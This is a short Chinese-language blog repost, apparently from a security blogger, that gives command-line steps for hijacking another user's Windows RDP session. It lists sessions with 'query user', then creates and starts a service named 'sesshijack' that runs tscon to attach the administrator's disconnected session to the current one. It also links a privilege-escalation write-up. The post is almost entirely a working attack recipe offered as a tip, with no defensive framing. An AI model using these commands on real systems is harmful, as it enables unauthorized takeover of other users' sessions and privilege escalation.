windows切换其他登陆用户

查看用户:

C:Windowssystem32>query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc            1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM

C:Windowssystem32>

创建服务:

C:Windowssystem32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS

启动服务:

net setart sesshijack

细节:

http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

最后由 Evi1cg 编辑于2017年03月20日 12:34

稿源:evilcg's blog (源链) | 关于 | 阅读提示

本站遵循[CC BY-NC-SA 4.0]。如您有版权、意见投诉等问题,请通过eMail联系我们处理。
酷辣虫 » 综合技术 » windows切换其他登陆用户

喜欢 (0)or分享给?

专业 x 专注 x 聚合 x 分享 CC BY-NC-SA 4.0

使用声明 | 英豪名录